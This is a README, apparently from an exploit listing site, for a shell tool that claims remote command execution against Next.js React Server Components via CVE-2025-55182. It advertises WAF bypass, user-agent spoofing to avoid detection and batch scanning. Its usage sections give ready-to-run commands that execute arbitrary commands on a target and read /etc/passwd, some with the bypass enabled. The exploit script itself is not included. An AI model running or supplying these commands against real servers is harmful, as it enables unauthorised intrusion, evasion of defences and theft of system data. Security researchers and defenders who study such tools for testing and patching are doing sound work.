Share
## https://sploitus.com/exploit?id=E810D3AC-7A32-5B7F-BA0D-401590C7DEBD
# CVE-2025-55182-poc-tool
A powerful exploit tool for detecting and exploiting **CVE-2025-55182** vulnerability in Next.js React Server Components. This tool allows remote command execution (RCE) in vulnerable Next.js applications with built-in **WAF bypass capabilities**.
## Overview
CVE-2025-55182 is a critical vulnerability in Next.js React Server Components that allows remote attackers to execute arbitrary commands on vulnerable servers. This tool provides an automated way to detect and exploit this vulnerability.
## Features
- Remote Command Execution: Execute arbitrary commands on vulnerable Next.js servers
- WAF Bypass: Built-in Web Application Firewall bypass with configurable junk data
- Custom Headers Support: Add custom HTTP headers for authentication or other purposes
- Flexible Targeting: Support for single targets and batch scanning
- Multiple Protocol Support: Automatic HTTPS/HTTP detection and handling
- Custom Timeouts: Configurable request timeouts for different network conditions
- SSL Verification Control: Option to disable SSL certificate verification
- Custom User-Agents: Spoof user agents to avoid detection
## Quick Install
```
# Clone the repository
git clone https://github.com/yourusername/cve-2025-55182-poc.git
cd CVE-2025-55182-poc-tool
# Make the script executable
chmod +x exploit.sh
# Test the installation
./exploit.sh -h
```
## Usage
The tool exposes several command-line options allowing researchers to customize requests, simulate traffic, or test filtering layers.
```bash
Usage: ./exploit.sh [OPTIONS]
Options:
-d, --domain Target domain/URL (default: http://localhost:3000)
If no protocol specified, defaults to https://
-c, --command Command to execute (default: id)
-w, --waf-bypass Enable WAF bypass with junk data (default: 128KB)
--waf-size SIZE WAF bypass data size in KB (default: 128)
--timeout SECONDS Request timeout in seconds (default: 15)
-k, --insecure Disable SSL certificate verification
--user-agent AGENT Custom User-Agent string
-h, --help Show this help message
```
## Basic Usage
```
# Check if target is vulnerable with default command
./exploit.sh -d https://target.com
# Execute custom command
./exploit.sh -d https://target.com -c "whoami"
# Read system files
./exploit.sh -d https://target.com -c "cat /etc/passwd"
```
## Advanced Usage
```
# Enable WAF bypass
./exploit.sh -d https://target.com -c "ls -la" -w
# Custom WAF bypass size (256KB)
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256
# Disable SSL verification
./exploit.sh -d https://target.com -c "id" -k
# Custom timeout
./exploit.sh -d https://target.com -c "ping -c 3 google.com" --timeout 30
# Custom User-Agent
./exploit.sh -d https://target.com -c "id" --user-agent "CustomScanner/1.0"
```
## Credits
- This tool is based on research by the security community. Special thanks to:
[infosec_au](https://x.com/infosec_au?s=11)
[zack0x01](https://x.com/zack0x01?s=11)